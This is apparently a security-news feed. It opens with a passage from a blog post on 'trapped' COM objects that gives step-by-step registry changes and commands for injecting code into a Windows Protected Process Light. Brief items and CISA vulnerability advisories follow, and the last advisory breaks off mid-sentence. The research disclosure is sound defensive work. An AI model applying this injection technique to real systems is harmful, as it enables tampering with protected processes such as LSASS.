     ---- WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32 WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe which is the shared service executable. Inspecting the type library through the interface is painful, to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes. Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service. I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look: PS> $parsed.ReferencedTypeLibs Name   Version TypeLibId ----   ------- --------- stdole 2.0     00020430-0000-0000-c000-000000000046 PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid Name       Uuid ----       ---- StdFont    0be35203-8f91-11ce-9de3-00aa004bb851 StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851 PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851 PS> $cls.Servers            Key Value            --- ----- InProcServer32 C:\Windows\System32\oleaut32.dll In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for the stdole which is basically always going to be imported. If you're lucky, maybe there's other libraries that are imported that you can inspect. We can parse the stdole library to inspect its list of classes. There's two classes that are exported by the type library, if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access.  Let's try to create the object in the COM service. PS> $iid = $parsed.Interfaces[0].Uuid PS> $ti = $lib.GetTypeInfoOfGuid($iid) PS> $href = $ti.GetRefTypeOfImplType(0) PS> $base = $ti.GetRefTypeInfo($href) PS> $stdole = $base.GetContainingTypeLib() PS> $stdole.Parse() Name   Version TypeLibId ----   ------- --------- stdole 2.0     00020430-0000-0000-c000-000000000046 PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851") PS> $font = $ti.CreateInstance() PS> Get-ComObjRef $font | Select ProcessId, ProcessName ProcessId ProcessName --------- -----------     27020 svchost.exe PS>  Get-ComInterface -Object $Obj Name                 IID                                  HasProxy   HasTypeLib ----                 ---                                  --------   ---------- ... IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process, the results shows its trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object. Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead. This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script. Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride: PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32 PS> $cls.AppIDEntry.ServiceProtectionLevel WindowsLight When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.Protected Process Injection I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows. The idea is simple, we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running the protected process. Choosing to use StdFont should be more generic as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution which also works in a protected process. Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the buggyness. The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process. Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process. The following steps need to be taken to achieve injection:Enable DCOM reflection in the registry.Add the TreatAs key to redirect StdFont to the System.Object COM class.Create the WaaSRemediationAgent object. Use the type library to get the StdFont class type info.Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.Create an object in the loaded assembly to force code to execute.Cleanup all registry changes. You'll need to do these steps in a non .NET language as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer. My PoC worked first-time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point but I wanted to know what was failing on Windows 11. Lets finish up with diving into that, to see if we could do something to get it to work on the latest version of Windows.The Problem with Windows 11 I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET. After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick. Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below: NTSTATUS VerifyTrust(LoadInfo *load_info) {   PS_PROTECTION protection;   BOOL is_protected;     CheckProtectedProcessForHardening(&is_protected, &protection);   if (!is_protected)     return SUCCESS;   ULONG flags;   BYTE level;   HANDLE handle = load_info->Handle;   NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level,                                              NULL, NULL, NULL);   if (FAILED(status) ||       (flags & 0x182) == 0 ||       FAILED(NtCompareSigningLevels(level, 12))) {     status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);   }   return status; } This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion. Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly with a catalog signing. The signing certificate is Microsoft Windows Production PCA 2011 which is exactly the same certificate as the .NET Runtime DLL so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signature level manually using my NtObjectManager PowerShell module to see if we get any insights: PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb" PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image} %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support. Error status 0x" PS> Format-HexDump $path -Length 64 -ShowAll           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF ----------------------------------------------------------------------------- 00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............ 00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C........... 00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %............... 00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3........... Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of type library file shows that it's a raw type library rather than packaged in a PE file. This is fairly uncommon on Windows, even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck, unless we can set a cached signing level on the file, it will be blocked from loading into the protected process and we need it to load to support the stub class to call the .NET interfaces over DCOM. As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it. We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it. PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb" PS> Format-HexDump $path -Length 64 -ShowAll           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF ----------------------------------------------------------------------------- 00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ.............. 00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@....... 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................ PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path PS> Get-NtCachedSigningLevel $path -Win32Path Flags               : TrustedSignature SigningLevel        : Windows Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2... ThumbprintBytes     : {185, 89, 12, 229...} ThumbprintAlgorithm : Sha256 Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care. Conclusions I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-orientated remoting cross process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries. While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level it allows access to the majority of processes running protected including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.

https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
Fraud Increases By 19% in the Year Ending September 2024
2025-01-30T15:12:03Z | 1738249923

Chad Reimers, general manager of fraud & ID at TransUnion in the UK, comments on the recent Office for National Statistics’ Crime in England and Wales Statistics: "The latest Crime in England and Wales figures from the Office for National Statistics have revealed that fraud offences have increased by 19% (to 3.9 million offences) in the year ending September 2024. Notably, the increase of 26% in consumer and retail fraud since the previous report, ending June 2024, comes as TransUnion’s latest Q4 2024 Consumer pulse found that 43% of UK adults reported being targeted by online, email, phone call or text messaging fraud attempts in the last three months.  “Over the past year, the fraud landscape has evolved, with social engineering, phone hacking, and data breaches creating fertile ground for bad actors. We know that fraud typologies are increasing in sophistication and complexity, particularly leveraging online marketplaces as an entry point. At the same time, firms are facing the challenge of greater costs to operate fraud prevention teams and reimburse consumers for fraud losses. It is therefore crucial that businesses and financial institutions continue to challenge the status quo of fraud prevention strategies and leverage complementary data, analytical, and technology capabilities to safeguard against new and emerging threats.  “Despite the significant rise in fraud activity, particularly in the consumer space, it was also notable that the reporting of fraud has remained relatively flat. This may demonstrate the need for continued consumer awareness programmes, and consumers themselves to take action, such as through the monitoring of credit profiles”.

https://newsroom.transunion.co.uk/fraud-increases-by-19-in-the-year-ending-september-2024/
Preserving integrity in the age of generative AI
2025-01-30T14:29:38Z | 1738247378

New ‘Content Credentials’ guidance from the NSA seeks to counter the erosion of trust.

https://www.ncsc.gov.uk/blog-post/preserving-integrity-in-age-generative-ai
Hackers: Targeting All Devices
2025-01-30T14:09:09Z | 1738246149

Your desktop computer isn’t the only device that can be hacked. The difference is that we all know that desktop computers can be vulnerable, and we protect them, but what about all those other devices that connect to the Internet? We are seeing an uptick in hackers going after the devices on the network that […]

https://secure64.com/2025/01/30/hackers-targeting-all-devices/
The Dark Side of the Web
2025-01-30T14:06:08Z | 1738245968

The Dark Side of the Web: Why Controlling Kids’ Online Access Matters In an increasingly digital world, the internet has become an integral part of childhood, offering limitless opportunities for education, entertainment, and social connection. Yet, beneath its surface lies a host of potential dangers that can profoundly impact young minds. From harmful content and […]

https://secure64.com/2025/01/30/the-dark-side-of-the-web/
S-RM continues strategic partnership with Invest Africa for 2025
2025-01-30T14:01:59Z | 1738245719

London, 30 January 2025 - Global corporate intelligence and cyber security consultancy S-RM has announced the continuation of its strategic partnership with Invest Africa, a leading business platform promoting trade and investment in Africa, for a second year.

https://www.s-rminform.com/news/s-rm-continues-strategic-partnership-with-invest-africa-for-2025
PyPI now supports archiving projects
2025-01-30T14:00:22Z | 1738245622

PyPI now supports marking projects as archived. Project owners can now archive their project to let users know that the project is not expected to receive any more updates. Project archival is a single piece in a larger supply-chain security puzzle: by exposing archival statuses, PyPI enables downstream consumers to make more […]

https://blog.trailofbits.com/2025/01/30/pypi-now-supports-archiving-projects/
Schneider Electric System Monitor Application in Harmony and Pro-face PS5000 Legacy Industrial PCs
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 9.8 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: Harmony Industrial PC, Pro-face Industrial PC Vulnerability: Exposure of Sensitive Information to an Unauthorized Actor 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to access sensitive information. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Schneider Electric reports that the following products are affected: System Monitor application in Harmony Industrial PC: All versions System Monitor application in Pro-face Industrial PC: All versions 3.2 Vulnerability Overview 3.2.1 EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200 An information exposure vulnerability exists that could cause exposure of credentials when attacker has access to application on network over HTTP. CVE-2024-8884 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: France 3.4 RESEARCHER Schneider Electric CPCERT reported this vulnerability to CISA. 4. MITIGATIONS Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk: System Monitor application in Harmony Industrial PC: Users can uninstall System Monitor application using installer available for download. System Monitor application in Pro-face Industrial PC: Customer can uninstall System Monitor application using installer available for download. Schneider Electric strongly recommends the use of back-ups and evaluating the impact of these patches in a test and development environment or on an offline infrastructure. Please follow the steps described in the guideline attached as a .pdf in the downloaded uninstaller guide. Contact Schneider Electric's Customer Care Center if you need assistance. If users choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: Stop the system monitor if not required by turning off the services as specified in user guide: Harmony Industrial PC Series User Manual Pro-face PS5000 legacy industrial PC Series User Manual Set up network segmentation and implement a firewall to block all unauthorized access to configured HTTP/HTTPS ports. Schneider Electric strongly recommends the following industry cybersecurity best practices: Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Place all controllers in locked cabinets and never leave them in the "Program" mode. Never connect programming software to any network other than the network intended for that device. Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. For more information refer to the Schneider Electric recommended cybersecurity best practices document and the associated Schneider Electric security notification SEVD-2024-282-07 in PDF and CSAF. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-030-03
Contec Health CMS8000 Patient Monitor
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: Contec Health Equipment: CMS8000 Patient Monitor Vulnerabilities: Out-of-bounds Write, Hidden Functionality (Backdoor), Privacy Leakage 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to remotely send specially formatted UDP requests or connect to an unknown external network that would allow them to write arbitrary data, resulting in remote code execution. The device may also leak patient information and sensor data to the same unknown external network. Simultaneous exploitation of all vulnerable devices on a shared network is possible. The Food and Drug Administration (FDA) has released a safety communication in connection with these vulnerabilities. CISA has released an additional Fact Sheet for CVE-2025-0626 and CVE-2025-0683. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Contec Health products are affected: CMS8000 Patient Monitor: Firmware version smart3250-2.6.27-wlan2.1.7.cramfs CMS8000 Patient Monitor: Firmware version CMS7.820.075.08/0.74(0.75) CMS8000 Patient Monitor: Firmware version CMS7.820.120.01/0.93(0.95) CMS8000 Patient Monitor: All versions (CVE-2025-0626, CVE-2025-0683) 3.2 Vulnerability Overview 3.2.1 OUT-OF-BOUNDS WRITE CWE-787 The affected product is vulnerable to an out-of-bounds write, which could allow an attacker to send specially formatted UDP requests in order to write arbitrary data. This could result in remote code execution. CVE-2024-12248 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2024-12248. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.2 HIDDEN FUNCTIONALITY (BACKDOOR) CWE-912 The affected product sends out remote access requests to a hard-coded IP address, bypassing existing device network settings to do so. This could serve as a backdoor and lead to a malicious actor being able to upload and overwrite files on the device. CVE-2025-0626 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0626. A base score of 7.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.3 EXPOSURE OF PRIVATE PERSONAL INFORMATION TO AN UNAUTHORIZED ACTOR (PRIVACY LEAKAGE) CWE-359 In its default configuration, the affected product transmits plain-text patient data to a hard-coded public IP address when a patient is hooked up to the monitor. This could lead to a leakage of confidential patient data to any device with that IP address or an attacker in a machine-in-the-middle scenario. CVE-2025-0683 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.9 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). A CVSS v4 score has also been calculated for CVE-2025-0683. A base score of 8.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Healthcare and Public Health COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: China 3.4 RESEARCHER An anonymous researcher reported these vulnerabilities to CISA. 4. MITIGATIONS Per FDA recommendation, CISA recommends users remove any Contec CMS8000 devices from their networks. Please note that this device may be re-labeled and sold by resellers. For a list of known re-labeled devices, please refer to FDA's safety communication. CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. Update firewall rules to prevent access to potentially affected devices. If network connected, ensure all medical devices are on a separate, low privilege subnet. Only use trusted manufacturers for safety critical systems. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-030-01
New Rock Technologies Cloud Connected Devices
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: New Rock Technologies Equipment: Cloud Connected Devices Vulnerabilities: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Improper Neutralization of Wildcards or Matching Symbols 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker full control of the device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of New Rock Technologies Cloud Connected Devices are affected: OM500 IP-PBX: All versions MX8G VoIP Gateway: All versions NRP1302/P Desktop IP Phone: All versions 3.2 Vulnerability Overview 3.2.1 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-78 Affected products contain a vulnerability in the device cloud rpc command handling process that could allow remote attackers to take control over arbitrary devices connected to the cloud. CVE-2025-0680 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0680. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.2 Improper Neutralization of Wildcards or Matching Symbols CWE-155 The Cloud MQTT service of the affected products supports wildcard topic subscription which could allow an attacker to obtain sensitive information from tapping the service communications. CVE-2025-0681 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.2 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). A CVSS v4 score has also been calculated for CVE-2025-0681. A base score of 6.9 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Communications, Healthcare and Public Health COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: China 3.4 RESEARCHER Tomer Goldschmidt of Claroty Team82 reported these vulnerabilities to CISA. 4. MITIGATIONS New Rock Technologies has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of New Rock Technologies Cloud Connected Devices are invited to contact New Rock Technologies customer support for additional information. CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-030-02
Rockwell Automation KEPServer
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 7.5 ATTENTION: Exploitable remotely/low attack complexity Vendor: Rockwell Automation Equipment: KEPServer Vulnerability: Uncontrolled Resource Consumption 2. RISK EVALUATION Successful exploitation of this vulnerability could cause the device to crash. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Rockwell Automation's KEPServer are affected: KEPServer: Versions 6.0 - 6.14.263 3.2 Vulnerability Overview 3.2.1 Uncontrolled Resource Consumption CWE-400 KEPServerEX Versions 6.0 to 6.14.263 are vulnerable to being made to read a recursively defined object that leads to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol which defines various object types that can be nested to create complex arrays. It does not implement a check to see if such an object is recursively defined, so an attack could send a maliciously created message that the decoder would try to decode until the stack overflowed and the device crashed. CVE-2023-3825 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER Rockwell Automation reported this vulnerability to CISA. 4. MITIGATIONS Rockwell automation recommends that users upgrade to KEPServer Version 6.15 or higher. Rockwell Automation also encourages users using the affected software to apply the following risk mitigations, if possible. For information on how to mitigate Security Risks on industrial automation control systems, Rockwell Automation encourages users to implement our suggested security best practices to minimize the risk of the vulnerability.Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations 